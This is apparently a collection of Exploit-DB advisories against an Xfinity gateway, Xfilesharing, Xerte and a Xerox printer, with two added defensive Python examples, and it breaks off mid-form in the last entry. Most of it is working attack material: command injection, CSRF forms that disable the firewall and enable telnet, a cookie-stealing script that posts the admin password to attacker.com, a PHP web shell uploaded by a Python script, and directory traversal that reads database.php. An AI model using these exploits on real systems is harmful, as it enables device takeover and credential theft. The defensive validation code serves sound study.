
# Exploit Title: Xfinity Gateway: Remote Code Execution
# Date: 12/2/2016
# Exploit Author: Gregory Smiley
# Contact: gsx0r.sec@gmail.com
# Vendor Homepage: http://xfinity.com
# Platform: php

The page located at /network_diagnostic_tools.php has a feature called test connectivity, which is carried out through a post request to /actionHandler/ajax_network_diagnostic_tools.php. The parameter destination_address is vulnerable to command injection.

PoC:

POST /actionHandler/ajax_network_diagnostic_tools.php HTTP/1.1
Host: 10.0.0.1
User-Agent:
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://10.0.0.1/network_diagnostic_tools.php
Content-Length: 91
Cookie: PHPSESSID=; auth=
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: keep-alive

test_connectivity=true&destination_address=www.comcast.net || ping -c3 attackerip; &count1=4


If you open Wireshark and set the display filter ip.dst==attackerip and icmp, you will see the router issue three ICMP echo requests, proving successful command injection. This can be leveraged to completely compromise the device.
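As an added example (not code from the advisory or from the gateway), here is the injectable pattern beside a hardened handler for the same destination_address and count1 parameters: the value is accepted only as a hostname or IP address, and ping receives an argv list so no shell ever parses it. The sample request bodies are constructed from the PoC above, with attackerip left as a placeholder.

```python
import re
import subprocess
from ipaddress import ip_address
from urllib.parse import parse_qs

# Constructed sample bodies for the gateway's test-connectivity handler: a normal
# request, and the injected one from the PoC above (attackerip is a placeholder).
SAFE_BODY = "test_connectivity=true&destination_address=www.comcast.net&count1=4"
INJECTED_BODY = ("test_connectivity=true&destination_address=www.comcast.net"
                 " || ping -c3 attackerip; &count1=4")

# RFC 1123-style hostname: dot-separated labels of letters, digits and hyphens,
# no label starting or ending with a hyphen, 253 characters at most.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\.?$")

# Characters that mean something to a shell. Useful as a detection signature when
# reviewing access logs or WAF events for this parameter, not as the only defence.
_SHELL_META_RE = re.compile(r"[|;&`$()<>\n\r]|\s")


def is_valid_destination(value: str) -> bool:
    """True only for a literal IPv4/IPv6 address or a syntactically valid hostname."""
    try:
        ip_address(value)
        return True
    except ValueError:
        return bool(_HOSTNAME_RE.match(value))


def looks_like_injection(value: str) -> bool:
    """Signature check: does the parameter carry shell metacharacters or whitespace?"""
    return bool(_SHELL_META_RE.search(value))


def build_ping_command_vulnerable(destination: str, count: str) -> str:
    """The injectable pattern: one shell string assembled by concatenation, so
    '||' and ';' inside destination split it into extra commands."""
    return "ping -c" + count + " " + destination


def check_connectivity_request(body: str):
    """Parse the form body and return (argv, None) when the request is acceptable,
    or (None, reason) when it must be rejected."""
    params = parse_qs(body, keep_blank_values=True)
    if params.get("test_connectivity", [""])[0] != "true":
        return None, "not a test_connectivity request"
    destination = params.get("destination_address", [""])[0]
    count = params.get("count1", ["4"])[0]
    if not count.isdigit() or not 1 <= int(count) <= 10:
        return None, "count1 must be an integer between 1 and 10"
    if not is_valid_destination(destination):
        return None, "destination_address is not a hostname or IP address"
    # An argv list: each element reaches ping as one argument and no shell parses
    # it, so metacharacters could not be interpreted even if validation slipped.
    return ["ping", "-c", str(int(count)), destination], None


def run_connectivity_test(body: str, runner=subprocess.run) -> bool:
    """Hardened handler: validate, then exec ping without a shell (shell=False)."""
    argv, reason = check_connectivity_request(body)
    if argv is None:
        raise ValueError(reason)
    completed = runner(argv, capture_output=True, text=True, timeout=30)
    return completed.returncode == 0


if __name__ == "__main__":
    for body in (SAFE_BODY, INJECTED_BODY):
        argv, reason = check_connectivity_request(body)
        print("ACCEPT" if argv else "REJECT", argv or reason)
```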

This vulnerability is also particularly dangerous because there are no CSRF protections in this application, as demonstrated here: https://www.exploit-db.com/exploits/40853/
            
EXPLOIT TITLE: CSRF RCE XFINITY WEB GATEWAY
AUTHOR: Pabstersac
DATE: 1ST OF AUGUST 2016
CVE: N/A
CATEGORY: REMOTE
CONTACT: pabstersac@gmail.com

IF ANYONE HAS COMMUNICATION WITH VENDOR PLEASE NOTIFY THEM SINCE THEY HAVE IGNORED ME.
CSRF FOR COMCAST XFINITY WEB GATEWAY. LEADS TO RCE AND ACCESS TO THE NETWORK AND MORE.
VENDOR HAS BEEN NOTIFIED NUMEROUS TIMES BUT NO RESPONSE RECEIVED.

1) ADD BLOCKED SITE

<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_add_blockedSite.php" method="post">

<input type="hidden" name='BlockInfo' value='{"URL": "http://test1.com", "alwaysBlock": "true"}'>

</form>

<script>document.x.submit();</script>


2) ADD BLOCKED KEYWORD

<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_add_blockedSite.php" method="post">

<input type="hidden" name='BlockInfo' value='{"Keyword": "http://test1.com", "alwaysBlock": "true"}'>

</form>

<script>document.x.submit();</script>


3) REMOVE BLOCKED SITE OR KEYWORD

<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_remove_blockedSite.php" method="post">

<input type="hidden" name='removeBlockInfo' value='{"InstanceID": "6"}'>

</form>

<script>document.x.submit();</script>


4) TRUST/UNTRUST DEVICES

<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_trust_computer.php" method="post">

<input type="hidden" name='TrustFlag' value='{"trustFlag": "true", "HostName": "test", "IPAddress": "10.0.0.82"}'>

</form>

<script>document.x.submit();</script>


5) DISABLE/ENABLE MANAGED SITES

<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_enable_manageSite.php" method="post">

<input type="hidden" name='Enable' value='{"Enable": "true"}'>

</form>

<script>document.x.submit();</script>


6) ADD MANAGED SERVICE (COMES WITH BONUS STORED XSS ;)

<form name="x" action="http://10.0.0.1/actionHandler/ajax_managed_services.php" method="post">

<input type="hidden" name='add' value='true'>
<input type="hidden" name='service' value='<img src=x onerror=alert(0)>'>
<input type="hidden" name='protocol' value='UDP'>
<input type="hidden" name='startPort' value='1234'>
<input type="hidden" name='endPort' value='1234'>
<input type="hidden" name='block' value='true'>

</form>

<script>document.x.submit();</script>


7) DELETE MANAGED SERVICE

http://10.0.0.1/actionHandler/ajax_managed_services.php?del=1


8) DISABLE/ENABLE MANAGED SERVICES

<form name="x" action="http://10.0.0.1/actionHandler/ajax_managed_services.php" method="post">

<input type="hidden" name='set' value='true'>
<input type="hidden" name='UMSStatus' value='Enabled'>


</form>

<script>document.x.submit();</script>


9) UNBLOCK DEVICE

http://10.0.0.1/actionHandler/ajax_managed_devices.php?del=2


10) ADD BLOCKED DEVICE (COMES WITH BONUS STORED XSS ;)

<form name="x" action="http://10.0.0.1/actionHandler/ajax_managed_devices.php" method="post">

<input type="hidden" name='add' value='true'>
<input type="hidden" name='type' value='Block'>
<input type="hidden" name='name' value='<img src=x onerror=alert(0)>'>
<input type="hidden" name='mac' value='xx:xx:xx:xx:xx:x2'>
<input type="hidden" name='block' value='true'>


</form>

<script>document.x.submit();</script>


11) ENABLE/DISABLE MANAGED DEVICES

<form name="x" action="http://10.0.0.1/actionHandler/ajax_managed_devices.php" method="post">

<input type="hidden" name='set' value='true'>
<input type="hidden" name='UMDStatus' value='Enabled'>



</form>

<script>document.x.submit();</script>


12) ADD PORT FORWARDING SERVICE (COMES WITH BONUS STORED XSS ;)

<form name="x" action="http://10.0.0.1/actionHandler/ajax_port_forwarding.php" method="post">

<input type="hidden" name='add' value='true'>
<input type="hidden" name='name' value='<img src=x onerror=alert(1)>'>
<input type="hidden" name='protocol' value='TCP/UDP'>
<input type="hidden" name='ip' value='10.0.0.82'>
<input type="hidden" name='ipv6addr' value='x'>
<input type="hidden" name='startport' value='123'>
<input type="hidden" name='endport' value='123'>

</form>

<script>document.x.submit();</script>


13) DELETE A PORT FORWARDING SERVICE

http://10.0.0.1/actionHandler/ajax_port_forwarding.php?del=5


14) EDIT EXISTING PORT FORWARDING SERVICES

<form name="x" action="http://10.0.0.1/actionHandler/ajax_port_forwarding.php" method="post">

<input type="hidden" name='edit' value='true'>
<input type="hidden" name='name' value='huhuhuh???New Name then …'>
<input type="hidden" name='protocol' value='TCP/UDP'>
<input type="hidden" name='ip' value='10.0.0.82'>
<input type="hidden" name='ipv6addr' value='x'>
<input type="hidden" name='startport' value='123'>
<input type="hidden" name='endport' value='123'>
<input type="hidden" name='ID' value='4'>


</form>

<script>document.x.submit();</script>


15) ENABLE/DISABLE PORT FORWARDING

<form name="x" action="http://10.0.0.1/actionHandler/ajax_port_forwarding.php" method="post">

<input type="hidden" name='set' value='true'>
<input type="hidden" name='UFWDStatus' value='Enabled'>



</form>

<script>document.x.submit();</script>


I’ll ignore port triggering cuz idc about port triggering . . .

16) CHANGE REMOTE MANAGEMENT SERVICE

<form name="x" action="http://10.0.0.1/actionHandler/ajax_remote_management.php" method="post">

<input type="hidden" name='http' value='true'>
<input type="hidden" name='httport' value='notset'>
<input type="hidden" name='https' value='true'>
<input type="hidden" name='httpsport' value='notset'>
<input type="hidden" name='allowtype' value='notset'>
<input type="hidden" name='startIP' value='notset'>
<input type="hidden" name='endIP' value='notset'>
<input type="hidden" name='telnet' value='notset'>
<input type="hidden" name='ssh' value='notset'>
<input type="hidden" name='startIPv6' value='notset'>
<input type="hidden" name='endIPv6' value='notset'>


</form>

<script>document.x.submit();</script>


17) CHANGE FIREWALL SETTINGS

<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_firewall_config.php" method="post">

<input type="hidden" name='configInfo' value='{"firewallLevel": "Low", "block_http": "Disabled", "block_icmp": "Disabled", "block_multicast": "Disabled", "block_peer": "Disabled", "block_ident": "Disabled", "disableFwForTrueStaticIP": "undefined"} '>



</form>

<script>document.x.submit();</script>


18) CHANGE PASSWORD PoC

UPLOAD test1.js TO yourjavascript.com (OR USE THE ONE I ALREADY UPLOADED : http://yourjavascript.com/1663477161/test1.js )
CONTENTS ARE:
document.cookie="PHPSESSID=1";k=document.cookie;f=k.replace("PHPSESSID=1","");d=f.replace("auth=","");s=d.replace(";","");g=s.replace("%3D","");t=atob(g);console.log(t);l=t.replace("admin:","");console.log(l);var xhttp=new XMLHttpRequest();xhttp.open("POST","/actionHandler/ajaxSet_password_config.php",true);xhttp.send('configInfo={"newPassword": "testpassword123", "oldPassword": "'+ l+'"}');

SHORTEN URL ON GOOGLE (OR USE THE ONE I ALREADY SHORTENED : http://goo.gl/FQHkQj)

CREATE HTML FILE : 

<form name="x" action="http://10.0.0.1/actionHandler/ajax_managed_devices.php" method="post">

<input type="hidden" name='add' value='true'>
<input type="hidden" name='type' value='Block'>
<input type="hidden" name='name' value='<script src="http://goo.gl/FQHkQj">'>
<input type="hidden" name='mac' value='xx:xx:xx:xx:xx:x8'>
<input type="hidden" name='block' value='true'>


</form>

<script>document.x.submit();</script>

I PUT MY SHORTENED URL IN THE SRC OF THE SCRIPT TAG


19) GET PASSWORD PoC

UPLOAD test1.js TO yourjavascript.com
CONTENTS ARE:
document.cookie="PHPSESSID=1";k=document.cookie;f=k.replace("PHPSESSID=1","");d=f.replace("auth=","");s=d.replace(";","");g=s.replace("%3D","");t=atob(g);console.log(t);l=t.replace("admin:","");console.log(l);var xhttp=new XMLHttpRequest();xhttp.open("POST","http://attacker.com/get_password.php",true);xhttp.send('configInfo={"newPassword": "testpassword123", "oldPassword": "'+ l+'"}');

SHORTEN URL ON GOOGLE 

CREATE HTML FILE : 

<form name="x" action="http://10.0.0.1/actionHandler/ajax_managed_devices.php" method="post">

<input type="hidden" name='add' value='true'>
<input type="hidden" name='type' value='Block'>
<input type="hidden" name='name' value='<script src="shortened url">'>
<input type="hidden" name='mac' value='xx:xx:xx:xx:xx:x8'>
<input type="hidden" name='block' value='true'>


</form>

<script>document.x.submit();</script>

I PUT MY SHORTENED URL IN THE SRC OF THE SCRIPT TAG

20) ACCESS DEVICES IN THE NETWORK

<form name="x" action="http://10.0.0.1/actionHandler/ajax_port_forwarding.php" method="post">

<input type="hidden" name='add' value='true'>
<input type="hidden" name='name' value='something'>
<input type="hidden" name='protocol' value='TCP/UDP'>
<input type="hidden" name='ip' value='Target Internal IP'>
<input type="hidden" name='ipv6addr' value='x'>
<input type="hidden" name='startport' value='Target Port'>
<input type="hidden" name='endport' value='Target Port'>

</form>

<script>document.x.submit();</script>

21) CREATE A NEW PRIVATE WI-FI NETWORK WITH THE PASSWORD OF YOUR CHOICE:

<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_wireless_network_configuration_edit.php" method="post">

<input type="hidden" name='configInfo' value='{"radio_enable":"true", "network_name":"MY-OWN-PRIVATE-PERSONAL-NETWORK", "wireless_mode":"g,n", "security":"WPAWPA2_PSK_TKIPAES", "channel_automatic":"true", "channel_number":"5", "network_password":"password", "broadcastSSID":"true", "enableWMM":"true", "ssid_number":"3"}'>

</form>

<script>document.x.submit();</script>

22) RCE
HTML FILE:
<form name="x" action="http://10.0.0.1/actionHandler/ajax_remote_management.php" method="post">

<input type="hidden" name='http' value='true'>
<input type="hidden" name='httport' value='notset'>
<input type="hidden" name='https' value='true'>
<input type="hidden" name='httpsport' value='notset'>
<input type="hidden" name='allowtype' value='notset'>
<input type="hidden" name='startIP' value='notset'>
<input type="hidden" name='endIP' value='notset'>
<input type="hidden" name='telnet' value='true'>
<input type="hidden" name='ssh' value='true'>
<input type="hidden" name='startIPv6' value='notset'>
<input type="hidden" name='endIPv6' value='notset'>


</form>
<!--Do part 19)-->

<form name="h" action="http://10.0.0.1/actionHandler/ajax_managed_devices.php" method="post">

<input type="hidden" name='add' value='true'>
<input type="hidden" name='type' value='Block'>
<input type="hidden" name='name' value='<script src="shortened url">'>
<input type="hidden" name='mac' value='xx:xx:xx:xx:xx:x8'>
<input type="hidden" name='block' value='true'>


</form>


<form name="f" action="http://10.0.0.1/actionHandler/ajaxSet_firewall_config.php" method="post">

<input type="hidden" name='configInfo' value='{"firewallLevel": "Low", "block_http": "Disabled", "block_icmp": "Disabled", "block_multicast": "Disabled", "block_peer": "Disabled", "block_ident": "Disabled", "disableFwForTrueStaticIP": "undefined"} '>



</form>
<script>document.x.submit();document.h.submit();document.f.submit();</script>

THEN TELNET TO THE IP ADDRESS THAT SENT THE REQUEST TO ATTACKER.COM/GET_PASSWORD.PHP AND USE THE USERNAME 'admin' AND THE PASSWORD YOU GOT IN ATTACKER.COM/GET_PASSWORD.PHP

THE AUTHOR TAKES NO RESPONSIBILITY FOR DAMAGE DONE WITH THIS EXPLOIT.
FOR PUBLISHING OR SENDING OR COPYING THIS EXPLOIT THE AUTHOR MUST BE GIVEN FULL CREDIT FOR THE EXPLOIT.
IF THE VULNERABILITY IS REPORTED TO VENDOR AND VENDOR RESPONDS AND FIXES IT THEN FULL CREDIT MUST BE GIVEN TO THE AUTHOR.
            
# Exploit Title: Xfilesharing 2.5.1 - Arbitrary File Upload
# Google Dork: inurl:/?op=registration
# Date: 2019-11-4
# Exploit Author: Noman Riffat
# Vendor Homepage: https://sibsoft.net/xfilesharing.html
# Version: <=2.5.1
# CVE : CVE-2019-18951, CVE-2019-18952

#####################
Arbitrary File Upload
#####################

<form action="http://xyz.com/cgi-bin/up.cgi" method="post" enctype="multipart/form-data">
    <input type="text" name="sid" value="joe">
    <input type="file" name="file">
    <input type="submit" value="Upload" name="submit">
</form>

Shell : http://xyz.com/cgi-bin/temp/joe/shell.php

####################
Local File Inclusion
####################

http://xyz.com/?op=page&tmpl=../../admin_settings

This URL fetches the "admin_settings.html" template without any authentication. The ".html" extension is hard coded on the server, so the included file must have an .html extension, but it can be anywhere on the server. You can also chain the LFI with the Arbitrary File Upload vulnerability: upload an HTML file, e.g. "upload.html", with "sid" set to "../../../../../../tmp", so that the file lands in the server's tmp directory. It can then be included as follows.

http://xyz.com/?op=page&tmpl=../../../../../../../tmp/upload

The Xfilesharing script has built-in shortcodes as well, so RCE can be achieved by including them in that "upload.html" file.

Noman Riffat, National Security Services Group Oman
@nomanriffat, @nssgoman
            
# Exploit Title: Xerte 3.9 - Remote Code Execution (RCE) (Authenticated)
# Date: 05/03/2021
# Exploit Author: Rik Lutz
# Vendor Homepage: https://xerte.org.uk
# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.8.5-33.zip
# Version: up until version 3.9
# Tested on: Windows 10 XAMP 
# CVE : CVE-2021-44664

# This PoC assumes guest login is enabled and the en-GB language files are used.
# This PoC will overwrite the existing language file (.inc) for the English index page with a shell.
# Vulnerable URL: https://<host>/website_code/php/import/fileupload.php
# The mediapath variable can be used to set the destination directory of the uploaded file.
# Create new project from template -> visit "Properties" (! symbol) -> Media and Quota

import requests
import re

xerte_base_url = "http://127.0.0.1"
php_session_id = "" # If guest is not enabled, and you have a session ID. Put it here.

with requests.Session() as session:
    # Get a PHP session ID
    if not php_session_id:
        session.get(xerte_base_url) 
    else:
        session.cookies.set("PHPSESSID", php_session_id)

    # Use a default template
    data = {
        'tutorialid': 'Nottingham',
        'templatename': 'Nottingham',
        'tutorialname': 'exploit',
        'folder_id': ''
    }

    # Create a new project in order to find the install path
    template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data)

    # Find template ID
    data = {
        'template_id': re.findall(r'(\d+)', template_id.text)[0]
    }

    # Find the install path:
    install_path = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data)
    install_path = re.findall('mediapath" value="(.+?)"', install_path.text)[0]

    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'nl,en-US;q=0.7,en;q=0.3',
        'Content-Type': 'multipart/form-data; boundary=---------------------------170331411929658976061651588978',
       }

    # index.inc file
    data = \
    '''-----------------------------170331411929658976061651588978
Content-Disposition: form-data; name="filenameuploaded"; filename="index.inc"
Content-Type: application/octet-stream

<?php
if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }
/**
 *
 * index.php english language file
 *
 * @author Patrick Lockley
 * @version 1.0
 * @copyright Pat Lockley
 * @package
 */

define("INDEX_USERNAME_AND_PASSWORD_EMPTY", "Please enter your username and password");

define("INDEX_USERNAME_EMPTY", "Please enter your username");

define("INDEX_PASSWORD_EMPTY", "Please enter your password");

define("INDEX_LDAP_MISSING", "PHP\'s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available");

define("INDEX_SITE_ADMIN", "Site admins should log on on the manangement page");

define("INDEX_LOGON_FAIL", "Sorry that password combination was not correct");

define("INDEX_LOGIN", "login area");

define("INDEX_USERNAME", "Username");

define("INDEX_PASSWORD", "Password");

define("INDEX_HELP_TITLE", "Getting Started");

define("INDEX_HELP_INTRODUCTION", "We\'ve produced a short introduction to the Toolkits website.");

define("INDEX_HELP_INTRO_LINK_TEXT","Show me!");

define("INDEX_NO_LDAP","PHP\'s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available");

define("INDEX_FOLDER_PROMPT","What would you like to call your folder?");

define("INDEX_WORKSPACE_TITLE","My Projects");

define("INDEX_CREATE","Project Templates");

define("INDEX_DETAILS","Project Details");

define("INDEX_SORT","Sort");

define("INDEX_SEARCH","Search");

define("INDEX_SORT_A","Alphabetical A-Z");

define("INDEX_SORT_Z","Alphabetical Z-A");

define("INDEX_SORT_NEW","Age (New to Old)");

define("INDEX_SORT_OLD","Age (Old to New)");

define("INDEX_LOG_OUT","Log out");

define("INDEX_LOGGED_IN_AS","Logged in as");

define("INDEX_BUTTON_LOGIN","Login");

define("INDEX_BUTTON_LOGOUT","Logout");

define("INDEX_BUTTON_PROPERTIES","Properties");

define("INDEX_BUTTON_EDIT","Edit");

define("INDEX_BUTTON_PREVIEW", "Preview");

define("INDEX_BUTTON_SORT", "Sort");

define("INDEX_BUTTON_NEWFOLDER", "New Folder");

define("INDEX_BUTTON_NEWFOLDER_CREATE", "Create");

define("INDEX_BUTTON_DELETE", "Delete");

define("INDEX_BUTTON_DUPLICATE", "Duplicate");

define("INDEX_BUTTON_PUBLISH", "Publish");

define("INDEX_BUTTON_CANCEL", "Cancel");

define("INDEX_BUTTON_SAVE", "Save");

define("INDEX_XAPI_DASHBOARD_FROM", "From:");

define("INDEX_XAPI_DASHBOARD_UNTIL", "Until:");

define("INDEX_XAPI_DASHBOARD_GROUP_SELECT", "Select group:");

define("INDEX_XAPI_DASHBOARD_GROUP_ALL", "All groups");

define("INDEX_XAPI_DASHBOARD_SHOW_NAMES", "Show names and/or email addresses");

define("INDEX_XAPI_DASHBOARD_CLOSE", "Close dashboard");

define("INDEX_XAPI_DASHBOARD_DISPLAY_OPTIONS", "Display options");

define("INDEX_XAPI_DASHBOARD_SHOW_HIDE_COLUMNS", "Show / hide columns");

define("INDEX_XAPI_DASHBOARD_QUESTION_OVERVIEW", "Interaction overview");

define("INDEX_XAPI_DASHBOARD_PRINT", "Print");
\r
\r
-----------------------------170331411929658976061651588978
Content-Disposition: form-data; name="mediapath"

''' \
    + install_path \
    + '''../../../languages/en-GB/
-----------------------------170331411929658976061651588978--\r
'''

    # Overwrite index.inc file
    response = session.post(xerte_base_url + '/website_code/php/import/fileupload.php', headers=headers, data=data)
    print('Installation path: ' + install_path)
    print(response.text)
    if "success" in response.text:
        print("Visit shell @: " + xerte_base_url + '/?cmd=whoami')
            
# Exploit Title: Xerte 3.10.3 - Directory Traversal (Authenticated)
# Date: 05/03/2021
# Exploit Author: Rik Lutz
# Vendor Homepage: https://xerte.org.uk
# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.9.zip
# Version: up until 3.10.3
# Tested on: Windows 10 XAMP
# CVE : CVE-2021-44665

# This PoC assumes guest login is enabled. Vulnerable URL:
# https://<host>/getfile.php?file=<user-directory>/../../database.php
# You can find a userfiles directory by creating a project and browsing the media menu.
# Create new project from template -> visit "Properties" (! symbol) -> Media and Quota -> Click file to download
# The userfiles directory will be noted in the URL and/or when you download a file.
# They look like: <numbers>-<username>-<templatename>

import requests
import re

xerte_base_url = "http://127.0.0.1"
file_to_grab = "/../../database.php"
php_session_id = "" # If guest is not enabled, and you have a session ID. Put it here.

with requests.Session() as session:
    # Get a PHP session ID
    if not php_session_id:
        session.get(xerte_base_url) 
    else:
        session.cookies.set("PHPSESSID", php_session_id)

    # Use a default template
    data = {
        'tutorialid': 'Nottingham',
        'templatename': 'Nottingham',
        'tutorialname': 'exploit',
        'folder_id': ''
    }

    # Create a new project in order to create a user-folder
    template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data)

    # Find template ID
    data = {
        'template_id': re.findall(r'(\d+)', template_id.text)[0]
    }

    # Find the created user directory:
    user_directory = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data)
    user_directory = re.findall(r'USER-FILES/([0-9]+-[a-z0-9]+-[a-zA-Z0-9_]+)', user_directory.text)[0]

    # Grab file
    result = session.get(xerte_base_url + '/getfile.php?file=' + user_directory + file_to_grab)
    print(result.text)
    print("|-- Used Variables: --|")
    print("PHP Session ID: " + session.cookies.get_dict()['PHPSESSID'])
    print("user directory: " + user_directory)
    print("Curl example:")
    print('curl --cookie "PHPSESSID=' + session.cookies.get_dict()['PHPSESSID'] + '" ' + xerte_base_url + '/getfile.php?file=' + user_directory + file_to_grab)
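An added example, not code from Xfilesharing, Xerte or either advisory, of the containment check that the ?op=page&tmpl= template lookup, the up.cgi "sid" upload folder, the Xerte mediapath upload destination and getfile.php?file= all lack: the untrusted value is joined onto its base directory, canonicalised, and accepted only if it still lies inside that base. The /srv/... base directories, the allowed-extension policy and the 123-guest-exploit directory name are constructed placeholders.

```python
import os
import re
from typing import Optional

# A single file or directory name: letters, digits, '.', '_' and '-', never starting
# with '.', so '.', '..' and separators are impossible. Fits the Xfilesharing "sid"
# folder and the Xerte <numbers>-<username>-<templatename> directory names.
_COMPONENT_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$")

# Constructed upload policy: no scripts and no templates that a later include could run.
_ALLOWED_UPLOAD_EXT = {".jpg", ".png", ".gif", ".pdf", ".zip"}


def is_single_component(name: str) -> bool:
    """True when name can only ever address one entry directly under a directory."""
    return bool(_COMPONENT_RE.match(name))


def resolve_inside(base_dir: str, untrusted_relpath: str,
                   forced_suffix: str = "") -> Optional[str]:
    """Join an untrusted relative path (plus an optional server-forced suffix such as
    '.html') onto base_dir. Return the canonical path only if it stays inside base_dir.

    realpath() collapses '..' and follows symlinks, so the decision is made on the
    path the OS would actually open, not on the string the client sent.
    """
    base = os.path.realpath(base_dir)
    # Leading separators would make os.path.join discard base_dir entirely.
    rel = untrusted_relpath.lstrip("/\\") + forced_suffix
    candidate = os.path.realpath(os.path.join(base, rel))
    # commonpath, not startswith: '/srv/x/templates2' must not pass for '/srv/x/templates'.
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def template_path(templates_dir: str, tmpl_param: str) -> Optional[str]:
    """Xfilesharing-style ?op=page&tmpl=... lookup with the hard-coded .html suffix,
    refusing anything that escapes the templates directory."""
    return resolve_inside(templates_dir, tmpl_param, ".html")


def upload_destination(user_files_dir: str, project_dir: str,
                       filename: str) -> Optional[str]:
    """Upload target built only from a server-chosen project directory and a validated
    file name; a client-supplied destination (Xfilesharing sid, Xerte mediapath) is
    never used as a path, and the extension must be on the allow-list."""
    if not (is_single_component(project_dir) and is_single_component(filename)):
        return None
    if os.path.splitext(filename)[1].lower() not in _ALLOWED_UPLOAD_EXT:
        return None
    return resolve_inside(user_files_dir, project_dir + "/" + filename)


def download_path(user_files_dir: str, file_param: str) -> Optional[str]:
    """Xerte-style getfile.php?file=<user-directory>/<name> lookup, contained to
    the USER-FILES tree."""
    return resolve_inside(user_files_dir, file_param)


if __name__ == "__main__":
    # Constructed base directories; they need not exist for realpath() to canonicalise.
    print(template_path("/srv/xfs/templates", "../../admin_settings"))  # None
    print(template_path("/srv/xfs/templates", "login"))  # /srv/xfs/templates/login.html
    print(download_path("/srv/xerte/USER-FILES", "123-guest-exploit/../../database.php"))  # None
    print(upload_destination("/srv/xfs/cgi-bin/temp", "../../../../../../tmp", "upload.html"))  # None
```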
            
# Exploit Title: XEROX WorkCentre 7855 Printer - Cross-Site Request Forgery (Add Admin)
# Date: 2018-12-19 
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.xerox.com/
# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/workcentre-7800-series/
# Software : Xerox Printer
# Product Version: WorkCentre® 7855
# Vulnerability Type : Cross-Site Request Forgery (Add Admin)
# Vulnerability : Cross-Site Request Forgery
# CVE : N/A

# Description :
# A CSRF vulnerability was discovered in the WorkCentre® 7855 model of Xerox printer hardware.
# A request to add a user is made from the Device User Database form. This request is captured
# with a proxy and a CSRF PoC HTML file is prepared from it. WorkCentre® 7855 printers allow CSRF:
# the request to add a user from the Device User Database form is posted to the xerox.set URI.
# (The frmUserName value must have a unique name.)

HTTP POST Request :

POST /dummypost/xerox.set HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 494
Origin: http://server
Connection: close
Referer: http://server/properties/authentication/UserEdit.php?x=&isRoles=True&isPassword=True&isCreate=True&crumb1=UserManager%3Fx%3D%26sort%3DFname%26order%3DUp
Cookie: PageToShow=; statusSelected=n1; statusNumNodes=8; PHPSESSID=04dc6361e94c451ff4d7d1d3ef8e32cd; WebTimerPopupID=12; propSelected=n30; propNumNodes=115; propHierarchy=00010000000000000000001000; LastPage=/properties/authentication/UserEdit.php%3F%26isRoles%3DTrue%26isPassword%3DTrue%26isCreate%3DTrue
Upgrade-Insecure-Requests: 1

CSRFToken=67a23ff66bbdd5a1cdb95afa3a677807d74a5d74e2c1d55c576008e0a0399738b55e54353be4b069a3e68c761350654aa7e27fdcbfb9b43148aa3a1f6e8e5f7b&_fun_function=HTTP_Set_ccgen_fac_dispatch_fn&NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp&CcgenModule=UserEdit&isRoles=True&isPassword=True&isCreate=True&rolesStr=2%2C5%2C1%2C&limited=False&oid=0&userName=ismailtasdelen&friendlyName=Ismail+Tasdelen&newPassword=Test1234&retypePassword=Test1234&role=2&role=1

HTTP Response :

HTTP/1.1 200 OK
Date: Thu, 19 Dec 2019 05:13:19 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 11947

CSRF HTML PoC :

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://server/dummypost/xerox.set" method="POST">
      <input type="hidden" name="CSRFToken" value="67a23ff66bbdd5a1cdb95afa3a677807d74a5d74e2c1d55c576008e0a0399738b55e54353be4b069a3e68c761350654aa7e27fdcbfb9b43148aa3a1f6e8e5f7b" />
      <input type="hidden" name="&#95;fun&#95;function" value="HTTP&#95;Set&#95;ccgen&#95;fac&#95;dispatch&#95;fn" />
      <input type="hidden" name="NextPage" value="&#47;properties&#47;authentication&#47;UserManager&#46;php&#63;x&#61;&sort&#61;Fname&order&#61;Up" />
      <input type="hidden" name="CcgenModule" value="UserEdit" />
      <input type="hidden" name="isRoles" value="True" />
      <input type="hidden" name="isPassword" value="True" />
      <input type="hidden" name="isCreate" value="True" />
